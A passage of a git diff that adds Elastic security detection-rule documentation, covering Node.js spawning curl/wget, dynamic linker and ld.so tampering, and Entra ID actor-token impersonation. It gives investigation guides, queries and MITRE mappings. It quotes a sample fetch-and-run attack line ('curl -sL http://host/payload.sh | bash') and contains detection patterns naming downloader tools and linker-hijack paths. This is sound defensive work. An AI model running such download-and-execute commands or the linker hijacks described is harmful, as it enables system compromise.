"/snap/*", "/dev/fd/*", "/usr/libexec/platform-python*", + "/var/lib/waagent/Microsoft*" + ) or + process.executable == null or + process.name in ( + "crond", "executor", "puppet", "droplet-agent.postinst", "cf-agent", "schedd", "imunify-notifier", "perl", + "jumpcloud-agent", "crio", "dnf_install", "utild" + ) or + (process.name == "sed" and file.name : "sed*") or + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name in ("vi", "vim") and file.name like "*~") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ diff --git 
a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc new file mode 100644 index 0000000000..281bc7bc1e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc @@ -0,0 +1,153 @@ +[[prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js]] +=== Curl or Wget Spawned via Node.js + +This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Curl or Wget Spawned via Node.js* + + +This rule flags Node.js launching curl or wget, directly or via a shell, a common technique to fetch payloads and enable command-and-control. Attackers often abuse child_process in Node apps to run "curl -sL http://host/payload.sh | bash," pulling a second stage from a remote host and executing it immediately under the guise of legitimate application activity. + + +*Possible investigation steps* + + +- Pull the full process tree and command line to extract URLs/domains, flags (e.g., -sL, -O, --insecure), and identify whether the output is piped into an interpreter, indicating immediate execution risk. +- Correlate with file system activity to find newly created or modified artifacts (e.g., in /tmp, /var/tmp, /dev/shm, or the app directory), then hash and scan them and check for follow-on executions. +- Pivot to network telemetry to enumerate connections around the event from both Node.js and the child process, assessing destination reputation (IP/domain, ASN, geo, cert/SNI) against approved update endpoints. +- Trace the initiating Node.js code path and deployment (child_process usage such as exec/spawn/execFile), and review package.json lifecycle scripts and recent npm installs or postinstall hooks for unauthorized download logic. +- Verify user and runtime context (service account/container/pod), inspect environment variables like HTTP(S)_PROXY/NO_PROXY, and check whether credentials or tokens were passed to curl/wget to assess exposure. + + +*False positive analysis* + + +- A legitimate Node.js service executes curl or wget to retrieve configuration files, certificates, or perform health checks against approved endpoints during startup or routine operation. 
+- Node.js install or maintenance scripts use a shell with -c to run curl or wget and download application assets or updates, triggering the rule even though this aligns with expected deployment workflows. + + +*Response and remediation* + + +- Immediately isolate the affected host or container, stop the Node.js service that invoked curl/wget (and any parent shell), terminate those processes, and block the exact URLs/domains/IPs observed in the command line and active connections. +- Quarantine and remove any artifacts dropped by the downloader (e.g., files in /tmp, /var/tmp, /dev/shm or paths specified by -O), delete added cron/systemd entries referencing those files, and revoke API tokens or credentials exposed in the command line or headers. +- Escalate to full incident response if output was piped to an interpreter (curl ... | bash or wget ... | sh), if --insecure/-k or self-signed endpoints were used, if unknown external infrastructure was contacted, or if secrets were accessed or exfiltrated. +- Rebuild and redeploy the workload from a known-good image, remove the malicious child_process code path from the Node.js application, restore validated configs/data, rotate any keys or tokens used by that service, and verify no further curl/wget spawns occur post-recovery. +- Harden by removing curl/wget from runtime images where not required, enforcing egress allowlists for the service, constraining execution with AppArmor/SELinux/seccomp and least-privilege service accounts, and adding CI/CD checks to block package.json postinstall scripts or code that shells out to downloaders. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". 
+- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and ( + ( + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.args == "-c" and process.command_line like~ ("*curl*", "*wget*") + ) or + ( + process.name in ("curl", "wget") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc new file mode 100644 index 0000000000..d937739b3a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc @@ -0,0 +1,193 @@ +[[prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification]] +=== Dynamic Linker Creation or Modification + +Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Dynamic Linker Creation or Modification* + + +The dynamic linker in Linux systems is crucial for loading shared libraries needed by programs at runtime. Adversaries may exploit this by altering linker configuration files to hijack program execution, enabling persistence or evasion. 
The detection rule identifies suspicious creation or renaming of these files, excluding benign processes and extensions, to flag potential threats. + + +*Possible investigation steps* + + +- Review the file path involved in the alert to determine if it matches any of the critical dynamic linker configuration files such as /etc/ld.so.preload, /etc/ld.so.conf.d/*, or /etc/ld.so.conf. +- Identify the process that triggered the alert by examining the process.executable field and verify if it is listed as a benign process in the exclusion list. If not, investigate the legitimacy of the process. +- Check the file extension and file.Ext.original.extension fields to ensure the file is not a temporary or expected system file, such as those with extensions like swp, swpx, swx, or dpkg-new. +- Investigate the process.name field to determine if the process is a known system utility like java, sed, or perl, and assess if its usage in this context is typical or suspicious. +- Gather additional context by reviewing recent system logs and other security alerts to identify any related or preceding suspicious activities that might indicate a broader attack or compromise. + + +*False positive analysis* + + +- Package management operations can trigger false positives when legitimate package managers like dpkg, rpm, or yum modify linker configuration files. To handle this, ensure these processes are included in the exclusion list to prevent unnecessary alerts. +- System updates or software installations often involve temporary file modifications with extensions like swp or dpkg-new. Exclude these extensions to reduce false positives. +- Automated system management tools such as Puppet or Chef may modify linker files as part of their configuration management tasks. Add these tools to the exclusion list to avoid false alerts. +- Virtualization and containerization platforms like Docker or VMware may alter linker configurations during normal operations. Verify these processes and exclude them if they are part of routine system behavior. +- Custom scripts or applications that use common names like sed or perl might be flagged if they interact with linker files. Review these scripts and consider excluding them if they are verified as safe. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary. +- Review and restore the original dynamic linker configuration files from a known good backup to ensure the integrity of the system's execution flow. +- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious software or scripts. +- Analyze system logs and the process execution history to identify the source of the unauthorized changes and determine if any other systems may be compromised. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the organization. +- Implement additional monitoring on the affected system and similar systems to detect any future attempts to modify dynamic linker configuration files. +- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify critical system files, reducing the risk of similar incidents in the future. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. 
+ + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
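+
+As a complement to the investigation steps above, a minimal read-only triage sketch for the monitored linker configuration paths is shown below; it is an example only and not an exhaustive check.
+
+[source, sh]
+----------------------------------
+# Any library listed in ld.so.preload is injected into every dynamically linked process
+cat /etc/ld.so.preload 2>/dev/null
+
+# Inspect drop-in configuration files along with their owners and modification times
+ls -la /etc/ld.so.conf.d/ /etc/ld.so.conf
+stat -c '%n owner=%U mtime=%y' /etc/ld.so.preload /etc/ld.so.conf /etc/ld.so.conf.d/* 2>/dev/null
+----------------------------------
+
+Entries in /etc/ld.so.preload, or recently modified files under /etc/ld.so.conf.d/ that were not written by a package manager, warrant closer review against the exclusions in the query below.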
+ + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action in ("creation", "rename") and +file.path : ("/etc/ld.so.preload", "/etc/ld.so.conf.d/*", "/etc/ld.so.conf") and +not ( + process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", + "/usr/lib/snapd/snap-update-ns", "/usr/bin/vmware-config-tools.pl", "./usr/bin/podman", "/bin/nvidia-cdi-hook", + "/usr/lib/dracut/dracut-install", "./usr/bin/nvidia-cdi-hook", "/.envbuilder/bin/envbuilder", "/usr/bin/buildah", + "/usr/sbin/dnf", "/usr/bin/pamac", "/sbin/pacman", "/usr/bin/crio", "/usr/sbin/yum-cron" + ) or + file.extension in ("swp", "swpx", "swx", "dpkg-remove") or + file.Ext.original.extension == "dpkg-new" or + process.executable : ( + "/nix/store/*", "/var/lib/dpkg/*", "/snap/*", "/dev/fd/*", "/usr/lib/virtualbox/*", "/opt/dynatrace/oneagent/*", + "/usr/libexec/platform-python*" + ) or + process.executable == null or + process.name in ( + "java", "executor", "ssm-agent-worker", "packagekitd", "crio", "dockerd-entrypoint.sh", + "docker-init", "BootTimeChecker", "dockerd (deleted)", "dockerd" + ) or + (process.name == "sed" and file.name : "sed*") or + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name == "init" and file.name == "ld.wsl.conf") or + (process.name == "sshd" and file.extension == "dpkg-new") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc new file mode 100644 index 0000000000..0f6defebff --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc @@ -0,0 +1,190 @@ +[[prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation]] +=== Dynamic Linker (ld.so) 
Creation + +This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-sentinel_one_cloud_funnel.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Tactic: Persistence +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Dynamic Linker (ld.so) Creation* + + +The dynamic linker, ld.so, is crucial in Linux environments for loading shared libraries required by executables. Adversaries may exploit this by replacing it with a malicious version to execute unauthorized code, achieving persistence or evading defenses. The detection rule identifies suspicious creation of ld.so files, excluding benign processes, to flag potential threats. + + +*Possible investigation steps* + + +- Review the process that triggered the alert by examining the process.executable field to understand which application attempted to create the ld.so file. +- Check the process.name field to ensure the process is not one of the benign processes listed in the exclusion criteria, such as "dockerd", "yum", "dnf", "microdnf", or "pacman". +- Investigate the file.path to confirm the location of the newly created ld.so file and verify if it matches any of the specified directories like "/lib", "/lib64", "/usr/lib", or "/usr/lib64". +- Analyze the parent process of the suspicious executable to determine if it was initiated by a legitimate or potentially malicious source. +- Look for any recent changes or anomalies in the system logs around the time of the file creation event to identify any related suspicious activities. +- Cross-reference the event with other security tools or logs, such as Elastic Defend or SentinelOne, to gather additional context or corroborating evidence of malicious activity. +- Assess the risk and impact of the event by considering the system's role and the potential consequences of a compromised dynamic linker on that system. + + +*False positive analysis* + + +- Package managers like yum, dnf, microdnf, and pacman can trigger false positives when they update or install packages that involve the dynamic linker. These processes are already excluded in the rule, but ensure any custom package managers or scripts are also considered for exclusion. +- Container management tools such as dockerd may create or modify ld.so files during container operations. If you use other container tools, consider adding them to the exclusion list to prevent false positives. 
+- System updates or maintenance scripts that involve library updates might create ld.so files. Review these scripts and add them to the exclusion list if they are verified as non-threatening. +- Custom administrative scripts or automation tools that interact with shared libraries could inadvertently trigger the rule. Identify these scripts and exclude them if they are part of regular, secure operations. +- Development environments where ld.so files are frequently created or modified during testing and compilation processes may need specific exclusions for development tools or environments to avoid false positives. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further malicious activity and lateral movement. +- Verify the integrity of the dynamic linker (ld.so) on the affected system by comparing it with a known good version from a trusted source or repository. +- If the dynamic linker has been tampered with, replace it with the verified version and ensure all system binaries are intact. +- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any additional malicious files or processes. +- Review system logs and the process creation history to identify the source of the unauthorized ld.so creation and any associated malicious activity. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems are affected. +- Implement additional monitoring and alerting for similar suspicious activities, such as unauthorized file creations in critical system directories, to enhance future detection capabilities. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. 
+- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and process.executable != null and +file.path like~ ("/lib/ld-linux*.so*", "/lib64/ld-linux*.so*", "/usr/lib/ld-linux*.so*", "/usr/lib64/ld-linux*.so*") and +not process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", + "/usr/lib/snapd/snap-update-ns", "./usr/bin/podman", "/usr/bin/crio", "/usr/bin/buildah", "/bin/dnf5", + "/usr/bin/dnf5", "/usr/bin/pamac" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc new file mode 100644 index 0000000000..a7ce074aa1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse]] +=== Entra ID Actor Token User Impersonation Abuse + +Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. 
Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/ +* https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55241 + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Actor Token User Impersonation Abuse* + + +This rule detects when Microsoft services use actor tokens to perform operations in audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) communication. They appear with a mismatch: the service's display name but the impersonated user's UPN. While some operations legitimately use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed attackers to obtain Global Admin privileges across any Entra ID tenant. Note that this vulnerability has been patched by Microsoft as of September 2025. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify which service principals are exhibiting this behavior. +- Check the `azure.auditlogs.properties.initiated_by.user.displayName` to confirm these are legitimate Microsoft services. +- Analyze the actions performed by these service principals - look for privilege escalations, permission grants, or unusual administrative operations. +- Review the timing and frequency of these events to identify potential attack patterns or automated exploitation. +- Cross-reference with recent administrative changes or service configurations that might explain legitimate use cases. +- Check if any new applications or service principals were registered recently that could be related to this activity. +- Investigate any correlation with other suspicious authentication events or privilege escalation attempts in your tenant. + + +*False positive analysis* + + +- Legitimate Microsoft service migrations or updates may temporarily exhibit this behavior. +- Third-party integrations using Microsoft Graph or other APIs might trigger this pattern during normal operations. +- Automated administrative tools or scripts using service principal authentication could be misconfigured. + + +*Response and remediation* + + +- Immediately review and audit all service principal permissions and recent consent grants in your Entra ID tenant. 
+- Disable or restrict any suspicious service principals exhibiting this behavior until verified. +- Review and revoke any unnecessary application permissions, especially those with high privileges. +- Enable and review Entra ID audit logs for any permission grants or role assignments made by these service principals. +- Implement Conditional Access policies to restrict service principal authentication from unexpected locations or conditions. +- Enable Entra ID Identity Protection to detect and respond to risky service principal behaviors. +- Review and harden application consent policies to prevent unauthorized service principal registrations. +- Consider implementing privileged identity management (PIM) for service principal role assignments. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.auditlogs-* metadata _id, _version, _index +| where azure.auditlogs.properties.initiated_by.user.displayName in ( + "Office 365 Exchange Online", + "Skype for Business Online", + "Dataverse", + "Office 365 SharePoint Online", + "Microsoft Dynamics ERP" + ) and + not azure.auditlogs.operation_name like "*group*" and + azure.auditlogs.operation_name != "Set directory feature on tenant" + and azure.auditlogs.properties.initiated_by.user.userPrincipalName rlike ".+@[A-Za-z0-9.]+\\.[A-Za-z]{2,}" +| keep + _id, + @timestamp, + azure.*, + client.*, + event.*, + source.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc 